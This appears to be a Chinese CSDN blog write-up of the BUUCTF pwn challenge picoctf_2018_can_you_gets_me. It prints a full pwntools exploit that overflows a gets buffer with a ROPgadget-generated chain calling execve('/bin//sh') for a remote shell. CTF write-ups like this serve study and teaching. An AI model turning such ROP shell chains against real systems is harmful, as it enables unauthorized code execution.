[BUUCTF-pwn]——picoctf_2018_can_you_gets_me

最新推荐文章于 2024-02-04 20:00:06 发布
最新推荐文章于 2024-02-04 20:00:06 发布
阅读量381 收藏
点赞数 1
分类专栏: # BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/114014571
版权

[BUUCTF-pwn]——picoctf_2018_can_you_gets_me

通过这道题又学到了一个知识点。ROPgadget构造rop链

还是先checksec一下
在这里插入图片描述
在IDA中,查看一下。有gets栈溢出,又有puts函数。想当然的我们想到,通过puts函数,leek出一个got表地址,找到libc的栈基址,进而找到system函数和’/bin/sh’
在这里插入图片描述
在这里插入图片描述
尝试过后你会发现不可以,你想象不到这个puts是手写的,你双击就可以知道,或者你也可以看旁边的函数框
在这里插入图片描述
ROPgadget不仅仅可以帮助我们查找汇编指令的地址,它还可以帮助我们构造汇编指令

ROPgadget --binary PicoCTF_2018_can-you-gets-me  --ropchain

在这里插入图片描述
得到的构造好的系统调用获得shell的rop链, 我们只需要将其作为返回地址就可以了

exploit

from pwn import *
from struct import pack
p = remote('node3.buuoj.cn',28293)
# p = process("./PicoCTF_2018_can-you-gets-me")


def payload():
	p = 'A' * (0x18 + 4)
	p += pack('<I', 0x0806f02a) # pop edx ; ret
	p += pack('<I', 0x080ea060) # @ .data
	p += pack('<I', 0x080b81c6) # pop eax ; ret
	p += b'/bin'
	p += pack('<I', 0x080549db) # mov dword ptr [edx], eax ; ret
	p += pack('<I', 0x0806f02a) # pop edx ; ret
	p += pack('<I', 0x080ea064) # @ .data + 4
	p += pack('<I', 0x080b81c6) # pop eax ; ret
	p += b'//sh'
	p += pack('<I', 0x080549db) # mov dword ptr [edx], eax ; ret
	p += pack('<I', 0x0806f02a) # pop edx ; ret
	p += pack('<I', 0x080ea068) # @ .data + 8
	p += pack('<I', 0x08049303) # xor eax, eax ; ret
	p += pack('<I', 0x080549db) # mov dword ptr [edx], eax ; ret
	p += pack('<I', 0x080481c9) # pop ebx ; ret
	p += pack('<I', 0x080ea060) # @ .data
	p += pack('<I', 0x080de955) # pop ecx ; ret
	p += pack('<I', 0x080ea068) # @ .data + 8
	p += pack('<I', 0x0806f02a) # pop edx ; ret
	p += pack('<I', 0x080ea068) # @ .data + 8
	p += pack('<I', 0x08049303) # xor eax, eax ; ret
	p += pack('<I', 0x0807a86f) # inc eax ; ret
	p += pack('<I', 0x0807a86f) # inc eax ; ret
	p += pack('<I', 0x0807a86f) # inc eax ; ret
	p += pack('<I', 0x0807a86f) # inc eax ; ret
	p += pack('<I', 0x0807a86f) # inc eax ; ret
	p += pack('<I', 0x0807a86f) # inc eax ; ret
	p += pack('<I', 0x0807a86f) # inc eax ; ret
	p += pack('<I', 0x0807a86f) # inc eax ; ret
	p += pack('<I', 0x0807a86f) # inc eax ; ret
	p += pack('<I', 0x0807a86f) # inc eax ; ret
	p += pack('<I', 0x0807a86f) # inc eax ; ret
	p += pack('<I', 0x0806cc25) # int 0x80
	return p

shellcode = payload()
p.send(shellcode)
p.interactive()
Y-peak
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[BUUCTF]PWN——picoctf_2018_can_you_gets_me
mcmuyanga的博客
01-21 708
picoctf_2018_can_you_gets_me 附件 步骤: 例行检查,32位,开启了nx 本地试运行一下,看看大概的情况 32位ida载入 一开始一看发现是简单的栈溢出,直接就准备用ret2libc的方法了,但是在我找plt表找put@plt的时候我傻了,没有,双击一下puts,发现找个puts是出题人自己写的函数 想起来了之前做到的一道题目inndy_rop,那题也是没法利用got表,所以利用了工具ROPgadget,它有一个功能,可以直接利用程序中的片段拼凑rop链,这边也尝试一下
非常规情况下栈溢出系统调用——PicoCTF_2018_can-you-gets-me
PLpa的博客
08-04 486
前言: 对于这种非常规的栈溢出题目,我自己也是见的比较少,故写此博客记录一下。 解题思路 查看保护 只开了NX保护的32位程序,如果是常规题的话,应该是非常容易做的。 进入IDA查看伪代码 打开IDA,如果是第一次见这种题目就会傻眼了。 题目中的每一个函数都好像是自己写的,那么我们就不能利用got表来泄露函数地址来getshell了。 题目开了NX保护,我们不能写shellcode,常规的ROP又利用不了,我们就完全利用不了libc里边的函数了。 乍一看,好像没什么办法了,但是我们可以用程序中非常多的g
picoctf_2018_can_you_gets_me
qq_62887641的博客
10-01 146
32位,只开了NX拿到这么大的程序,直接ROPchain看看果不其然然后去ida看看溢出点秒了。
[BUUCTF]-PWN:picoctf_2018_can_you_gets_me解析(系统调用,自己编写shellcode)
最新发布
2301_79326813的博客
02-04 440
先看保护再看ida有一个不限长度的输入点gets,那能干的就很多了。通俗易懂的思路有以下两种。
picoctf_2018_shellcode
qq_62887641的博客
10-01 253
32位,啥都没开这个看着挺大的,直接来个ROPchain,还真有,然后让我看看溢出点main函数无法编译,(得看汇编了(但是我们可以反汇编vuln函数vuln很简单,但是a1在栈中的位置我们看看main传了什么进去把var_A0传入,也就是我们输入的位置,从var_A0开始写入在观察一下main的汇编发现一个东西在main的后面有个也就是说,我们写的东西能直接执行,并且也没开NX。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
【标题】"PWN.rar" 是一个包含与 AVR 单片机、PWM 脉冲输出、GPS 和 FPGA 相关资源的压缩包。其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出...
PWN.rar_pulse verilog_pulse width_verilog hdl
09-20
在电子设计自动化(EDA)领域,Verilog HDL是一种广泛使用的硬件描述语言,用于描述数字逻辑系统,包括微处理器、接口电路以及各种嵌入式系统。本教程将深入探讨如何利用Verilog HDL实现脉冲宽度调制(PWM)。...
PWM-OUT.rar_PWN_out
09-19
"PWM-OUT.rar_PWN_out"这个压缩包文件,显然是关于如何在某种微控制器上设置和使用PWM输出的教程或代码示例。 在微控制器中,PWM的生成主要涉及到以下几个关键知识点: 1. **PWM通道**:微控制器通常有多个PWM通道...
[BUUCTF-pwn]——picoctf_2018_shellcode
Y_peak的博客
02-24 362
[BUUCTF-pwn]——picoctf_2018_shellcode 题目地址:https://buuoj.cn/challenges#picoctf_2018_shellcode 论学好汇编的重要性。在这道题得到了体现。 第一次面向汇编, 说实话看的挺慢的。 话不多说 直接上 checksec看下 IDA中没法发反汇编,只能面向汇编编程。无法反汇编是call eax的问题,但是这个指令应该没有错,只能说这个时间eax存储着一个函数地址。也就是[ebp+var_A0]偏移处的函数。 我们可以发现
[buuctf]PicoCTF_2018_shellcode
逆向萌新的博客
07-17 396
[buuctf]PicoCTF_2018_shellcode,这道题主要是考你的shellcode编写能力和使用能力,或者是利用pwntools自动生成的shellcode进行利用
[BUUCTF]PWN——picoctf_2018_shellcode
mcmuyanga的博客
01-23 562
picoctf_2018_shellcode 附件 步骤 虽然题目都叫shellcode了,肯定没有开什么保护,但还是例行检查,32位程序 本地试运行一下,看看大概的情况 32位ida打开,没法f5,只能看汇编了,汇编太长就不截图了,做题做多了,直接看vlun,一般这个函数都有漏洞 看到vlun里调用了gets,参数是ebp+arg_0,结合main函数我们可以看到,gets 函数写入的地址即为 [ebp+var_A0] 对应的地址 然后在main函数里又发现,我们gets写入的地址,下
CTF | PWN练习一
qq_42646885的博客
07-26 2197
预备知识: 1、了解PWN(溢出) PWN是一个黑客语法的俚语词,自"own"这个字引申出来的,这个词的含意在于,玩家在整个游戏对战中处在胜利的优势,或是说明竞争对手处在完全惨败的 情形下,这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个游戏对战中已经完全被击败(例如:"You just got pwned!")。有一个非常著名的国际赛事叫做Pwn2Own,相信你现在已经能够...
[BUUCTF]PWN——picoctf_2018_rop chain
mcmuyanga的博客
11-04 971
picoctf_2018_rop chain 附件 步骤: 例行检查,32位,开启了NX保护 试运行一下程序,看到输入太长数据会崩溃 32位ida载入,习惯性的检索程序里的字符串,看见了flag.txt,双击跟进 看到程序将flag读入到了参数s里面,满足条件win1&&win2 &&a1==-59039827的条件,就能读出flag 从main函数开始看程序 vuln()函数 gets函数输入,没有限制读入长度,存在溢出漏洞,覆盖ret为flag函数地址,之后想
持续更新 BUUCTF——PWN(二)
weixin_41748164的博客
12-14 385
buuctf pwn 第三页
IDA反汇编工具初探
剑神一笑的游戏世界
11-13 1万+
看过>的朋友一定知道吸星大法吧,这是一种可以吸取他人内功来使自己功力增长的神功,(段誉的北冥神功也是这样, 扯远了...).对于程序员来说,增长自己编程功力的一个好方法是阅读其它人开发的程序的源码,从而把别人的技术来消化成为自己知识,这是不是很象吸星大法?但开源的程序毕竟是在少数,大多数程序都只会分发可执行文件及相关文件,这时我们要想查看此程序的代码,就只有把它反汇编,当然这需要一定的汇编功底,但
ida动态调试elf(无坑详细)
热门推荐
abc_670的博客
04-24 1万+
虽然linux下有gdb,radare2等神器,但有时候难免有用到ida动态调试linux下文件的时候,这次自己按照网上教程来但是踩了无数坑,所以打算自己写一篇教程1.把ida中dbgsrv目录下的linux_server或者linux_serverx64放到linux中(根据自己要调试的程序选择哪个版本的)2.chmod a+x linux_serverx64改变属性,然后运行 linux_se...
buuctf [HarekazeCTF2019]baby_rop2
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值